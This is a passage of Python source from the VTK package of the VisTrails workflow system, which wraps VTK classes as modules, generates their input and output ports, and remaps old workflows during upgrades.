        if get_description_class(module.vtkClass)!=vtk.vtkStructuredPointsGeometryFilter:
            # We try to instantiate the class here to get the number of
            # ports and to avoid abstract classes
            try:
                instance = module.vtkClass()
            except TypeError:
                # abstract class: no instance, so no connection ports
                pass
            else:
                registry = get_module_registry()
                des = registry.get_descriptor_by_name('edu.utah.sci.vistrails.vtk',
                                                      'vtkAlgorithmOutput')
                # one indexed input/output connection port per VTK port
                for i in xrange(0,instance.GetNumberOfInputPorts()):
                    registry.add_input_port(module, 'SetInputConnection%d'%i,
                                            des.module)
                for i in xrange(0,instance.GetNumberOfOutputPorts()):
                    registry.add_output_port(module, 'GetOutputPort%d'%i,
                                             des.module)
# Set/Get pairs that are pipeline plumbing or internal state and must not
# become ports.
disallowed_set_get_ports = {
    'ReferenceCount',
    'InputConnection',
    'OutputPort',
    'Progress',
    'ProgressText',
    'InputArrayToProcess',
}
def addSetGetPorts(module, get_set_dict, delayed):
    """ addSetGetPorts(module: Module, get_set_dict: dict) -> None
    Convert all Setxxx methods of module into input ports and all Getxxx
    methods of module into output ports

    Keyword arguments:
    module --- Module
    get_set_dict --- the Set/Get method signatures returned by vtk_parser
    delayed --- object with an add_input_port list; ports that cannot be
    registered yet (see the RenderWindow case) are appended to it

    """
    klass = get_description_class(module.vtkClass)
    registry = get_module_registry()
    for name in get_set_dict.iterkeys():
        if name in disallowed_set_get_ports: continue
        getterMethod = getattr(klass, 'Get%s'%name)
        setterMethod = getattr(klass, 'Set%s'%name)
        getterSig = get_method_signature(getterMethod)
        setterSig = get_method_signature(setterMethod)
        if len(getterSig) > 1:
            prune_signatures(module, 'Get%s'%name, getterSig, output=True)
        for order, getter in enumerate(getterSig):
            # getters with parameters or multiple return values can't map
            # to a single output port
            if getter[1]:
                debug("Can't handle getter %s (%s) of class %s: Needs input to "
                      "get output" % (order+1, name, klass))
                continue
            if len(getter[0]) != 1:
                debug("Can't handle getter %s (%s) of class %s: More than a "
                      "single output" % (order+1, name, str(klass)))
                continue
            class_ = typeMap(getter[0][0])
            if is_class_allowed(class_):
                registry.add_output_port(module, 'Get'+name, class_, True)
        if len(setterSig) > 1:
            prune_signatures(module, 'Set%s'%name, setterSig)
        for ix, setter in enumerate(setterSig):
            if setter[1]==None: continue
            # overloaded setters get numeric suffixes on the port name
            n = resolve_overloaded_name('Set' + name, ix, setterSig)
            if len(setter[1]) == 1 and is_class_allowed(typeMap(setter[1][0])):
                registry.add_input_port(module, n,
                                        typeMap(setter[1][0]),
                                        setter[1][0] in typeMapDict)
            else:
                classes = [typeMap(i) for i in setter[1]]
                if all(is_class_allowed(x) for x in classes):
                    registry.add_input_port(module, n, classes, True)

        # Wrap SetFileNames for VisTrails file access
        if file_name_pattern.match(name):
            registry.add_input_port(module, 'Set' + name[:-4],
                                    (File, 'input file'), False)
        # Wrap SetRenderWindow for exporters
        elif name == 'RenderWindow':
            # cscheid 2008-07-11 This is messy: VTKCell isn't
            # registered yet, so we can't use it as a port
            # However, we can't register VTKCell before these either,
            # because VTKCell requires vtkRenderer. The "right" way would
            # be to add all modules first, then all ports. However, that would
            # be too slow.
            # Workaround: delay the addition of the port by storing
            # the information in a list
            if registry.has_module('edu.utah.sci.vistrails.spreadsheet',
                                   'SpreadsheetCell'):
                delayed.add_input_port.append((module, 'SetVTKCell', VTKCell, False))
        # Wrap color methods for VisTrails GUI facilities
        elif name == 'DiffuseColor':
            registry.add_input_port(module, 'SetDiffuseColorWidget',
                                    (Color, 'color'), True)
        elif name == 'Color':
            registry.add_input_port(module, 'SetColorWidget',
                                    (Color, 'color'), True)
        elif name == 'AmbientColor':
            registry.add_input_port(module, 'SetAmbientColorWidget',
                                    (Color, 'color'), True)
        elif name == 'SpecularColor':
            registry.add_input_port(module, 'SetSpecularColorWidget',
                                    (Color, 'color'), True)
        elif name == 'EdgeColor':
            registry.add_input_port(module, 'SetEdgeColorWidget',
                                    (Color, 'color'), True)
        elif name == 'Background' :
            registry.add_input_port(module, 'SetBackgroundWidget',
                                    (Color, 'color'), True)
        elif name == 'Background2' :
            registry.add_input_port(module, 'SetBackground2Widget',
                                    (Color, 'color'), True)
# Toggle methods that must not be exposed as On/Off ports.
disallowed_toggle_ports = {
    'GlobalWarningDisplay',
    'Debug',
}
def addTogglePorts(module, toggle_dict):
    """ addTogglePorts(module: Module, toggle_dict: dict) -> None
    Convert all xxxOn/Off methods of module into input ports

    Each allowed toggle becomes a pair of optional, parameterless input
    ports named '<name>On' and '<name>Off'.
    """
    registry = get_module_registry()
    for name in toggle_dict.iterkeys():
        if name in disallowed_toggle_ports:
            continue
        for suffix in ('On', 'Off'):
            registry.add_input_port(module, name + suffix, [], True)
# SetxxxToyyy state ports that must not be registered.
disallowed_state_ports = {'SetInputArrayToProcess'}
def addStatePorts(module, state_dict):
    """ addStatePorts(module: Module, state_dict: dict) -> None
    Convert all SetxxxToyyy methods of module into input ports

    Keyword arguments:
    module --- Module
    state_dict --- the State method signatures returned by vtk_parser

    """
    klass = get_description_class(module.vtkClass)
    registry = get_module_registry()
    for name in state_dict.iterkeys():
        for mode in state_dict[name]:
            # Creates the port Set foo to bar
            field = 'Set'+name+'To'+mode[0]
            if field in disallowed_state_ports:
                continue
            if not registry.has_input_port(module, field):
                registry.add_input_port(module, field, [], True)

        # Now create the port Set foo with parameter
        if hasattr(klass, 'Set%s'%name):
            setterMethod = getattr(klass, 'Set%s'%name)
            setterSig = get_method_signature(setterMethod)
            # if the signature looks like an enum, we'll skip it, it shouldn't
            # be necessary
            if len(setterSig) > 1:
                prune_signatures(module, 'Set%s'%name, setterSig)
            for ix, setter in enumerate(setterSig):
                n = resolve_overloaded_name('Set' + name, ix, setterSig)
                # NOTE(review): unlike addSetGetPorts there is no
                # 'setter[1] == None' guard here, so a parameterless
                # overload would raise on setter[1][0]; presumably state
                # setters always take a parameter -- confirm.
                tm = typeMap(setter[1][0])
                if len(setter[1]) == 1 and is_class_allowed(tm):
                    registry.add_input_port(module, n, tm,
                                            setter[1][0] in typeMapDict)
                else:
                    classes = [typeMap(i) for i in setter[1]]
                    if all(is_class_allowed(x) for x in classes):
                        registry.add_input_port(module, n, classes, True)
# Methods that must never be auto-wrapped as ports: object plumbing,
# observer management, copy operations and pipeline update calls.
disallowed_other_ports = {
    'BreakOnError',
    'DeepCopy',
    'FastDelete',
    'HasObserver',
    'HasExecutive',
    'INPUT_ARRAYS_TO_PROCESS',
    'INPUT_CONNECTION',
    'INPUT_IS_OPTIONAL',
    'INPUT_IS_REPEATABLE',
    'INPUT_PORT',
    'INPUT_REQUIRED_DATA_TYPE',
    'INPUT_REQUIRED_FIELDS',
    'InvokeEvent',
    'IsA',
    'Modified',
    'NewInstance',
    'PrintRevisions',
    'RemoveAllInputs',
    'RemoveObserver',
    'RemoveObservers',
    'SafeDownCast',
    # 'SetInputArrayToProcess',
    'ShallowCopy',
    'Update',
    'UpdateInformation',
    'UpdateProgress',
    'UpdateWholeExtent',
}
# Ports that must be registered as mandatory (not optional) inputs.
force_not_optional_port = {'ApplyViewTheme'}
def addOtherPorts(module, other_list):
    """ addOtherPorts(module: Module, other_list: list) -> None
    Convert all other ports such as Insert/Add.... into input/output

    Keyword arguments:
    module --- Module
    other_dict --- any other method signatures that is not
    Algorithm/SetGet/Toggle/State type

    """
    klass = get_description_class(module.vtkClass)
    registry = get_module_registry()
    for name in other_list:
        # special-cased: expose the void-pointer copy as a String port
        if name=='CopyImportVoidPointer':
            registry.add_input_port(module, 'CopyImportVoidString', (String, 'value'), False)
        if name[:3] in ['Add','Set'] or name[:6]=='Insert':
            if name in disallowed_other_ports:
                continue
            method = getattr(klass, name)
            signatures = ""
            # ints can appear in the method table (e.g. constants); skip them
            if not isinstance(method, int):
                signatures = get_method_signature(method)
            if len(signatures) > 1:
                prune_signatures(module, name, signatures)
            for (ix, sig) in enumerate(signatures):
                ([result], params) = sig
                types = []
                if params:
                    for p in params:
                        t = typeMap(p)
                        if not t:
                            # one unmappable parameter disqualifies the overload
                            types = None
                            break
                        else: types.append(t)
                else:
                    types = [[]]
                if types:
                    if not all(is_class_allowed(x) for x in types):
                        continue
                    n = resolve_overloaded_name(name, ix, signatures)
                    if len(types)<=1:
                        registry.add_input_port(module, n, types[0],
                                                types[0] in typeMapDictValues)
                    else:
                        registry.add_input_port(module, n, types, True)
        else:
            # non Add/Set/Insert methods: only parameterless or
            # valueless overloads become (possibly mandatory) input ports
            if name in disallowed_other_ports:
                continue
            method = getattr(klass, name)
            signatures = ""
            if not isinstance(method, int):
                signatures = get_method_signature(method)
            if len(signatures) > 1:
                prune_signatures(module, name, signatures)
            for (ix, sig) in enumerate(signatures):
                ([result], params) = sig
                types = []
                if params:
                    # flatten nested parameter lists front-first
                    paramsList = list(params)
                    while (len(paramsList) != 0):
                        p = paramsList.pop(0)
                        if type(p) == list:
                            for aux in p: paramsList.insert(0, aux)
                        else:
                            types.append(typeMap(p))
                else:
                    types = []
                if not all(is_class_allowed(x) for x in types):
                    continue
                if types==[] or (result==None):
                    n = resolve_overloaded_name(name, ix, signatures)
                    registry.add_input_port(module, n, types,
                                            not (n in force_not_optional_port))
# Getters that describe object/pipeline internals rather than data; never
# exposed as output ports.
disallowed_get_ports = {
    'GetClassName',
    'GetErrorCode',
    'GetNumberOfInputPorts',
    'GetNumberOfOutputPorts',
    'GetOutputPortInformation',
    'GetTotalNumberOfInputConnections',
}
def addGetPorts(module, get_list):
    """Register each plain Getxxx method in `get_list` as an optional
    output port on `module`.

    Getters that take arguments or return more than one value are skipped,
    as are disallowed names and return types.  When a getter remains
    overloaded after pruning, each port name gets a 1-based numeric suffix.
    """
    klass = get_description_class(module.vtkClass)
    registry = get_module_registry()
    for name in get_list:
        if name in disallowed_get_ports:
            continue
        signatures = get_method_signature(getattr(klass, name))
        if len(signatures) > 1:
            prune_signatures(module, name, signatures, output=True)
        for ix, (returns, params) in enumerate(signatures):
            # only parameterless, single-value getters become ports
            if params or len(returns) > 1:
                continue
            port_type = typeMap(returns[0])
            if not is_class_allowed(port_type):
                continue
            if len(signatures) > 1:
                port_name = name + "_" + str(ix+1)
            else:
                port_name = name
            registry.add_output_port(module, port_name, port_type, True)
def addPorts(module, delayed):
    """ addPorts(module: VTK module inherited from Module,
                 delayed: object with add_input_port slot
                 ) -> None
    Search all metamethods of module and add appropriate ports

    ports that cannot be added immediately should be appended to
    the delayed object that is passed. see the SetRenderWindow cases.

    """
    klass = get_description_class(module.vtkClass)
    registry = get_module_registry()
    # every wrapped module exposes itself on a 'self' output port
    registry.add_output_port(module, 'self', module)
    # the shared parser categorizes the class's methods; the add* helpers
    # below each consume one category
    parser.parse(klass)
    addAlgorithmPorts(module)
    addGetPorts(module, parser.get_get_methods())
    addSetGetPorts(module, parser.get_get_set_methods(), delayed)
    addTogglePorts(module, parser.get_toggle_methods())
    addStatePorts(module, parser.get_state_methods())
    addOtherPorts(module, parser.get_other_methods())
    # special per-class ports; note the == comparisons (rather than a dict
    # dispatch) — VTK class hashing is unreliable pre-5.0.4, see
    # get_description_class above
    # CVS version of VTK doesn't support AddInputConnect(vtkAlgorithmOutput)
    if klass==vtk.vtkAlgorithm:
        registry.add_input_port(module, 'AddInputConnection',
                                typeMap('vtkAlgorithmOutput'))
    # vtkWriters have a custom File port
    elif klass==vtk.vtkWriter:
        registry.add_output_port(module, 'file',
                                 typeMap('File','edu.utah.sci.vistrails.basic'))
    elif klass==vtk.vtkImageWriter:
        registry.add_output_port(module, 'file',
                                 typeMap('File','edu.utah.sci.vistrails.basic'))
    elif klass==vtk.vtkVolumeProperty:
        registry.add_input_port(module, 'SetTransferFunction',
                                typeMap('TransferFunction'))
    elif klass==vtk.vtkDataSet:
        registry.add_input_port(module, 'SetPointData', typeMap('vtkPointData'))
        registry.add_input_port(module, 'SetCellData', typeMap('vtkCellData'))
    elif klass==vtk.vtkCell:
        registry.add_input_port(module, 'SetPointIds', typeMap('vtkIdList'))
def setAllPorts(descriptor, delayed):
    """ setAllPorts(descriptor: ModuleDescriptor) -> None
    Traverse descriptor and all of its children/grand-children to add all ports

    Uses an explicit stack, preserving the same preorder traversal as the
    recursive formulation.
    """
    stack = [descriptor]
    while stack:
        current = stack.pop()
        addPorts(current.module, delayed)
        # push children reversed so they are visited in original order
        stack.extend(reversed(current.children))
def class_dict(base_module, node):
    """class_dict(base_module, node) -> dict
    Returns the class dictionary for the module represented by node and
    with base class base_module.

    The returned dict maps attribute names -- notably 'compute' and the
    '_special_input_function_*' hooks -- to callables that will be placed
    on the auto-generated VisTrails module class for this VTK class.
    """
    class_dict_ = {}
    def update_dict(name, callable_):
        # Install/override an entry: callable_ receives the current value
        # (from this dict, from the base module, or None if absent) and
        # returns the replacement.  This lets wrappers chain or defer to
        # an already-defined implementation.
        if class_dict_.has_key(name):
            class_dict_[name] = callable_(class_dict_[name])
        elif hasattr(base_module, name):
            class_dict_[name] = callable_(getattr(base_module, name))
        else:
            class_dict_[name] = callable_(None)
    def guarded_SimpleScalarTree_wrap_compute(old_compute):
        # This builds the scalar tree and makes it cacheable
        def compute(self):
            self.is_cacheable = lambda *args, **kwargs: True
            old_compute(self)
            self.vtkInstance.BuildTree()
        return compute
    def guarded_SetFileName_wrap_compute(old_compute):
        # This checks for the presence of file in VTK readers
        def compute(self):
            # Skips the check if it's a vtkImageReader or vtkPLOT3DReader, because
            # it has other ways of specifying files, like SetFilePrefix for
            # multiple files
            if any(issubclass(self.vtkClass, x)
                   for x in
                   [vtk.vtkBYUReader,
                    vtk.vtkImageReader,
                    vtk.vtkPLOT3DReader,
                    vtk.vtkDICOMImageReader,
                    vtk.vtkTIFFReader]):
                old_compute(self)
                return
            # Accept the filename either directly or via a File object.
            if self.hasInputFromPort('SetFileName'):
                name = self.getInputFromPort('SetFileName')
            elif self.hasInputFromPort('SetFile'):
                name = self.getInputFromPort('SetFile').name
            else:
                raise ModuleError(self, 'Missing filename')
            if not os.path.isfile(name):
                raise ModuleError(self, 'File does not exist')
            old_compute(self)
        return compute
    # The compute_*Widget helpers below all follow the same pattern: if a
    # handler already exists, keep it; otherwise forward the widget's color
    # tuple to the matching vtkInstance setter.
    def compute_SetDiffuseColorWidget(old_compute):
        if old_compute != None:
            return old_compute
        def call_SetDiffuseColorWidget(self, color):
            self.vtkInstance.SetDiffuseColor(color.tuple)
        return call_SetDiffuseColorWidget
    def compute_SetAmbientColorWidget(old_compute):
        if old_compute != None:
            return old_compute
        def call_SetAmbientColorWidget(self, color):
            self.vtkInstance.SetAmbientColor(color.tuple)
        return call_SetAmbientColorWidget
    def compute_SetSpecularColorWidget(old_compute):
        if old_compute != None:
            return old_compute
        def call_SetSpecularColorWidget(self, color):
            self.vtkInstance.SetSpecularColor(color.tuple)
        return call_SetSpecularColorWidget
    def compute_SetColorWidget(old_compute):
        if old_compute != None:
            return old_compute
        def call_SetColorWidget(self, color):
            self.vtkInstance.SetColor(color.tuple)
        return call_SetColorWidget
    def compute_SetEdgeColorWidget(old_compute):
        if old_compute != None:
            return old_compute
        def call_SetEdgeColorWidget(self, color):
            self.vtkInstance.SetEdgeColor(color.tuple)
        return call_SetEdgeColorWidget
    def compute_SetBackgroundWidget(old_compute):
        if old_compute != None:
            return old_compute
        def call_SetBackgroundWidget(self, color):
            self.vtkInstance.SetBackground(color.tuple)
        return call_SetBackgroundWidget
    def compute_SetBackground2Widget(old_compute):
        if old_compute != None:
            return old_compute
        def call_SetBackground2Widget(self, color):
            self.vtkInstance.SetBackground2(color.tuple)
        return call_SetBackground2Widget
    def compute_SetVTKCell(old_compute):
        # Connect this object to the render window of a spreadsheet cell.
        if old_compute != None:
            return old_compute
        def call_SetRenderWindow(self, cellObj):
            if cellObj.cellWidget:
                self.vtkInstance.SetRenderWindow(cellObj.cellWidget.mRenWin)
        return call_SetRenderWindow
    def compute_SetTransferFunction(old_compute):
        # This sets the transfer function
        if old_compute != None:
            return old_compute
        def call_SetTransferFunction(self, tf):
            tf.set_on_vtk_volume_property(self.vtkInstance)
        return call_SetTransferFunction
    def compute_SetPointData(old_compute):
        if old_compute != None:
            return old_compute
        def call_SetPointData(self, pd):
            self.vtkInstance.GetPointData().ShallowCopy(pd)
        return call_SetPointData
    def compute_SetCellData(old_compute):
        if old_compute != None:
            return old_compute
        def call_SetCellData(self, cd):
            self.vtkInstance.GetCellData().ShallowCopy(cd)
        return call_SetCellData
    def compute_SetPointIds(old_compute):
        if old_compute != None:
            return old_compute
        def call_SetPointIds(self, point_ids):
            # Copy the id list element by element into our own vtkIdList.
            self.vtkInstance.GetPointIds().SetNumberOfIds(point_ids.GetNumberOfIds())
            for i in xrange(point_ids.GetNumberOfIds()):
                self.vtkInstance.GetPointIds().SetId(i, point_ids.GetId(i))
        return call_SetPointIds
    def compute_CopyImportString(old_compute):
        if old_compute != None:
            return old_compute
        def call_CopyImportVoidPointer(self, pointer):
            self.vtkInstance.CopyImportVoidPointer(pointer, len(pointer))
        return call_CopyImportVoidPointer
    def guarded_Writer_wrap_compute(old_compute):
        # The behavior for vtkWriter subclasses is to call Write()
        # If the user sets a name, we will create a file with that name
        # If not, we will create a temporary file from the file pool
        def compute(self):
            old_compute(self)
            fn = self.vtkInstance.GetFileName()
            if not fn:
                o = self.interpreter.filePool.create_file(suffix='.vtk')
                self.vtkInstance.SetFileName(o.name)
            else:
                o = File()
                o.name = fn
            self.vtkInstance.Write()
            self.setResult('file', o)
        return compute
    for var in dir(node.klass):
        # Everyone that has a Set.*FileName should have a Set.*File port too
        if set_file_name_pattern.match(var):
            # Extra closure level binds `var` at definition time (avoids the
            # usual late-binding-in-a-loop pitfall).
            def get_compute_SetFile(method_name):
                def compute_SetFile(old_compute):
                    if old_compute != None:
                        return old_compute
                    def call_SetFile(self, file_obj):
                        getattr(self.vtkInstance, method_name)(file_obj.name)
                    return call_SetFile
                return compute_SetFile
            # var[:-4] strips the trailing 'Name': SetXFileName -> SetXFile.
            update_dict('_special_input_function_' + var[:-4],
                        get_compute_SetFile(var))
    if hasattr(node.klass, 'SetFileName'):
        # ... BUT we only want to check existence of filenames on
        # readers. VTK is nice enough to be consistent with names, but
        # this is brittle..
        if node.klass.__name__.endswith('Reader'):
            if not node.klass.__name__.endswith('TiffReader'):
                update_dict('compute', guarded_SetFileName_wrap_compute)
    if hasattr(node.klass, 'SetRenderWindow'):
        update_dict('_special_input_function_SetVTKCell',
                    compute_SetVTKCell)
    #color gui wrapping
    if hasattr(node.klass, 'SetDiffuseColor'):
        update_dict('_special_input_function_SetDiffuseColorWidget',
                    compute_SetDiffuseColorWidget)
    if hasattr(node.klass, 'SetAmbientColor'):
        update_dict('_special_input_function_SetAmbientColorWidget',
                    compute_SetAmbientColorWidget)
    if hasattr(node.klass, 'SetSpecularColor'):
        update_dict('_special_input_function_SetSpecularColorWidget',
                    compute_SetSpecularColorWidget)
    if hasattr(node.klass, 'SetEdgeColor'):
        update_dict('_special_input_function_SetEdgeColorWidget',
                    compute_SetEdgeColorWidget)
    if hasattr(node.klass, 'SetColor'):
        update_dict('_special_input_function_SetColorWidget',
                    compute_SetColorWidget)
    if (issubclass(node.klass, vtk.vtkRenderer) and
        hasattr(node.klass, 'SetBackground')):
        update_dict('_special_input_function_SetBackgroundWidget',
                    compute_SetBackgroundWidget)
    if (issubclass(node.klass, vtk.vtkRenderer) and
        hasattr(node.klass, 'SetBackground2')):
        update_dict('_special_input_function_SetBackground2Widget',
                    compute_SetBackground2Widget)
    if issubclass(node.klass, vtk.vtkWriter):
        update_dict('compute', guarded_Writer_wrap_compute)
    if issubclass(node.klass, vtk.vtkScalarTree):
        update_dict('compute', guarded_SimpleScalarTree_wrap_compute)
    if issubclass(node.klass, vtk.vtkVolumeProperty):
        update_dict('_special_input_function_SetTransferFunction',
                    compute_SetTransferFunction)
    if issubclass(node.klass, vtk.vtkDataSet):
        update_dict('_special_input_function_SetPointData',
                    compute_SetPointData)
        update_dict('_special_input_function_SetCellData',
                    compute_SetCellData)
    if issubclass(node.klass, vtk.vtkCell):
        update_dict('_special_input_function_SetPointIds',
                    compute_SetPointIds)
    if issubclass(node.klass, vtk.vtkImageImport):
        update_dict('_special_input_function_CopyImportString',
                    compute_CopyImportString)
    return class_dict_
# VTK classes that must not be wrapped as VisTrails modules at all
# (createModule returns early for these names).
disallowed_modules = set([
    'vtkGeoAlignedImageCache',
    'vtkGeoTerrainCache',
    'vtkMPIGroup'
])
def createModule(baseModule, node):
    """ createModule(baseModule: a Module subclass, node: TreeNode) -> None
    Construct a module inherits baseModule with specification from node,
    register it with the module registry, and recurse into node's children.
    """
    if node.name in disallowed_modules: return
    def obsolete_class_list():
        # Build the list of obsolete VTK classes that are present in this
        # VTK build; missing ones are silently skipped.
        lst = []
        items = ['vtkInteractorStyleTrackball',
                 'vtkStructuredPointsGeometryFilter',
                 'vtkConstrainedPointHandleRepresentation']
        def try_to_add_item(item):
            try:
                lst.append(getattr(vtk, item))
            except AttributeError:
                pass
        for item in items:
            try_to_add_item(item)
        return lst
    obsolete_list = obsolete_class_list()
    def is_abstract():
        """is_abstract tries to instantiate the class. If it's
        abstract, this will raise."""
        # Consider obsolete classes abstract
        if node.klass in obsolete_list:
            return True
        try:
            getattr(vtk, node.name)()
        except TypeError: # VTK raises type error on abstract classes
            return True
        return False
    module = new_module(baseModule, node.name,
                        class_dict(baseModule, node),
                        docstring=getattr(vtk, node.name).__doc__
                        )
    # This is sitting on the class; prefer a patched replacement class from
    # fix_classes when one exists (named '<vtkClass>_fixed').
    if hasattr(fix_classes, node.klass.__name__ + '_fixed'):
        module.vtkClass = getattr(fix_classes, node.klass.__name__ + '_fixed')
    else:
        module.vtkClass = node.klass
    registry = get_module_registry()
    registry.add_module(module, abstract=is_abstract(),
                        signatureCallable=vtk_hasher)
    for child in node.children:
        if child.name in disallowed_classes:
            continue
        createModule(module, child)
def createAllModules(g):
    """ createAllModules(g: ClassTree) -> None
    Traverse the VTK class tree and add all modules into the module registry
    """
    v = vtk.vtkVersion()
    version = [v.GetVTKMajorVersion(),
               v.GetVTKMinorVersion(),
               v.GetVTKBuildVersion()]
    if version < [5, 7, 0]:
        # Pre-5.7 VTK has a single root class, vtkObjectBase.
        assert len(g.tree[0]) == 1
        base = g.tree[0][0]
        assert base.name == 'vtkObjectBase'
    # The root VisTrails module is always created by hand from vtkBaseModule.
    vtkObjectBase = new_module(vtkBaseModule, 'vtkObjectBase')
    vtkObjectBase.vtkClass = vtk.vtkObjectBase
    registry = get_module_registry()
    registry.add_module(vtkObjectBase)
    if version < [5, 7, 0]:
        for child in base.children:
            if child.name in disallowed_classes:
                continue
            createModule(vtkObjectBase, child)
    else:
        # VTK >= 5.7 may have several roots; wrap the children of each one
        # under the single vtkObjectBase module.
        for base in g.tree[0]:
            for child in base.children:
                if child.name in disallowed_classes:
                    continue
                createModule(vtkObjectBase, child)
##############################################################################
# Convenience methods
def extract_vtk_instance(vistrails_obj):
    """extract_vtk_instance(vistrails_obj) -> vtk_object

    Given an instance of a VisTrails module that subclasses the
    vtkObjectBase module, return the raw VTK instance it wraps.
    """
    global identifier
    base_descriptor = registry.get_descriptor_by_name(identifier,
                                                      'vtkObjectBase')
    assert isinstance(vistrails_obj, base_descriptor.module)
    return vistrails_obj.vtkInstance
def wrap_vtk_instance(vtk_obj):
    """wrap_vtk_instance(vtk_object) -> VisTrails module

    Look up the VisTrails module matching vtk_obj's class name and return
    a new instance of it wrapping vtk_obj.
    """
    global identifier
    assert isinstance(vtk_obj, vtk.vtkObjectBase)
    descriptor = registry.get_descriptor_by_name(identifier,
                                                 vtk_obj.GetClassName())
    wrapped = descriptor.module()
    wrapped.vtkInstance = vtk_obj
    return wrapped
################################################################################
def initialize():
    """ initialize() -> None
    Package-entry to initialize the package.

    NOTE: the registration order below is deliberate and must not be
    reordered (see the inline comments).
    """
    # Check VTK version
    v = vtk.vtkVersion()
    version = [v.GetVTKMajorVersion(),
               v.GetVTKMinorVersion(),
               v.GetVTKBuildVersion()]
    if version < [5, 0, 0]:
        raise Exception("You need to upgrade your VTK install to version \
> >= 5.0.0")
    inheritanceGraph = ClassTree(vtk)
    inheritanceGraph.create()
    # Transfer Function constant
    tf_widget.initialize()
    # Collector for ports that cannot be added during the main traversal
    # (see addSetGetPorts / the SetRenderWindow cases).
    delayed = InstanceObject(add_input_port=[])
    # Add VTK modules
    registry = get_module_registry()
    registry.add_module(vtkBaseModule)
    createAllModules(inheritanceGraph)
    setAllPorts(registry.get_descriptor_by_name(identifier,
                                                'vtkObjectBase'),
                delayed)
    # Register the VTKCell and VTKHandler type if the spreadsheet is up
    if registry.has_module('edu.utah.sci.vistrails.spreadsheet',
                           'SpreadsheetCell'):
        import vtkhandler
        import vtkcell
        import vtkviewcell
        vtkhandler.registerSelf()
        vtkcell.registerSelf()
        vtkviewcell.registerSelf()
    # register offscreen rendering module
    offscreen.register_self()
    # Now add all "delayed" ports - see comment on addSetGetPorts
    for args in delayed.add_input_port:
        registry.add_input_port(*args)
    # register Transfer Function adjustment
    # This can't be reordered -- TransferFunction needs to go before
    # vtkVolumeProperty, but vtkScaledTransferFunction needs
    # to go after vtkAlgorithmOutput
    getter = registry.get_descriptor_by_name
    registry.add_module(tf_widget.vtkScaledTransferFunction)
    registry.add_input_port(tf_widget.vtkScaledTransferFunction,
                            'Input', getter('edu.utah.sci.vistrails.vtk',
                                            'vtkAlgorithmOutput').module)
    registry.add_input_port(tf_widget.vtkScaledTransferFunction,
                            'Dataset', getter ('edu.utah.sci.vistrails.vtk',
                                               'vtkDataObject').module)
    registry.add_input_port(tf_widget.vtkScaledTransferFunction,
                            'Range', [Float, Float])
    registry.add_input_port(tf_widget.vtkScaledTransferFunction,
                            'TransferFunction',
                            tf_widget.TransferFunctionConstant)
    registry.add_output_port(tf_widget.vtkScaledTransferFunction,
                             'TransferFunction',
                             tf_widget.TransferFunctionConstant)
    registry.add_output_port(tf_widget.vtkScaledTransferFunction,
                             'vtkPiecewiseFunction',
                             getter('edu.utah.sci.vistrails.vtk',
                                    'vtkPiecewiseFunction').module)
    registry.add_output_port(tf_widget.vtkScaledTransferFunction,
                             'vtkColorTransferFunction',
                             getter('edu.utah.sci.vistrails.vtk',
                                    'vtkColorTransferFunction').module)
    inspectors.initialize()
################################################################################
# Workflow-upgrade machinery state, populated lazily by
# handle_module_upgrade_request: _remap maps module names to upgrade
# specifications; _controller and _pipeline hold the context of the
# upgrade currently being processed.
_remap = None
_controller = None
_pipeline = None
def _get_controller():
    """Return the controller stashed by handle_module_upgrade_request."""
    # Reading a module global needs no `global` declaration.
    return _controller
def _get_pipeline():
    """Return the pipeline stashed by handle_module_upgrade_request."""
    # Reading a module global needs no `global` declaration.
    return _pipeline
def build_remap(module_name=None):
    """Populate the global _remap table with port/function upgrade rules.

    If module_name is given, only that module's descriptor is processed;
    otherwise every descriptor in this package is.  The rules handle the
    renaming of overloaded ports to their numbered forms ('Foo' -> 'Foo_1',
    'Foo_2', ...) introduced after version 0.9.3.
    """
    global _remap, _controller
    reg = get_module_registry()
    # Matches numbered overload ports, e.g. 'SetInput_2' -> ('SetInput', '2').
    uscore_num = re.compile(r"(.+)_(\d+)$")
    def get_port_specs(descriptor, port_type):
        # Collect port specs over the whole module hierarchy; subclasses
        # (iterated last) override superclass entries.
        ports = {}
        for desc in reversed(reg.get_module_hierarchy(descriptor)):
            ports.update(reg.module_ports(port_type, desc))
        return ports
    def build_remap_method(desc, port_prefix, port_num, port_type):
        # for connection, need to differentiate between src and dst
        if port_type == 'input':
            conn_lookup = Connection._get_destination
            get_port_spec = reg.get_input_port_spec
            idx = 1
        else:
            conn_lookup = Connection._get_source
            get_port_spec = reg.get_output_port_spec
            idx = 0
        def remap(old_conn, new_module):
            # Re-create old_conn against new_module, picking the numbered
            # port whose signature matches the old connection's endpoint.
            create_new_connection = UpgradeWorkflowHandler.create_new_connection
            port = conn_lookup(old_conn)
            pipeline = _get_pipeline()
            modules = [pipeline.modules[old_conn.source.moduleId],
                       pipeline.modules[old_conn.destination.moduleId]]
            modules[idx] = new_module
            ports = [old_conn.source, old_conn.destination]
            # NOTE(review): xrange(1, port_num) never tries the highest
            # numbered port ('_<port_num>'); confirm whether the upper
            # bound should be port_num + 1.
            for i in xrange(1, port_num):
                port_name = "%s_%d" % (port_prefix, i)
                port_spec = get_port_spec(modules[idx], port_name)
                if port_spec.sigstring == port.signature:
                    ports[idx] = port_name
                    new_conn = create_new_connection(_get_controller(),
                                                     modules[0],
                                                     ports[0],
                                                     modules[1],
                                                     ports[1])
                    return [('add', new_conn)]
            # if get here, just try to use _1 version?
            ports[idx] = "%s_%d" % (port_prefix, 1)
            new_conn = create_new_connection(_get_controller(),
                                             modules[0],
                                             ports[0],
                                             modules[1],
                                             ports[1])
            return [('add', new_conn)]
        return remap
    def build_function_remap_method(desc, port_prefix, port_num):
        # Known exceptions: functions that must map to a specific overload
        # number rather than the signature-matched or _1 default.
        f_map = {"vtkCellArray": {"InsertNextCell": 3}}
        def build_function(old_function, new_function_name, new_module):
            # Copy parameter values and aliases onto a new function object.
            controller = _get_controller()
            if len(old_function.parameters) > 0:
                new_param_vals, aliases = \
                    zip(*[(p.strValue, p.alias)
                          for p in old_function.parameters])
            else:
                new_param_vals = []
                aliases = []
            new_function = controller.create_function(new_module,
                                                      new_function_name,
                                                      new_param_vals,
                                                      aliases)
            return new_function
        def remap(old_function, new_module):
            for i in xrange(1, port_num):
                port_name = "%s_%d" % (port_prefix, i)
                port_spec = reg.get_input_port_spec(new_module, port_name)
                old_sigstring = \
                    reg.expand_port_spec_string(old_function.sigstring,
                                                basic_pkg)
                if port_spec.sigstring == old_sigstring:
                    new_function = build_function(old_function, port_name,
                                                  new_module)
                    new_module.add_function(new_function)
                    return []
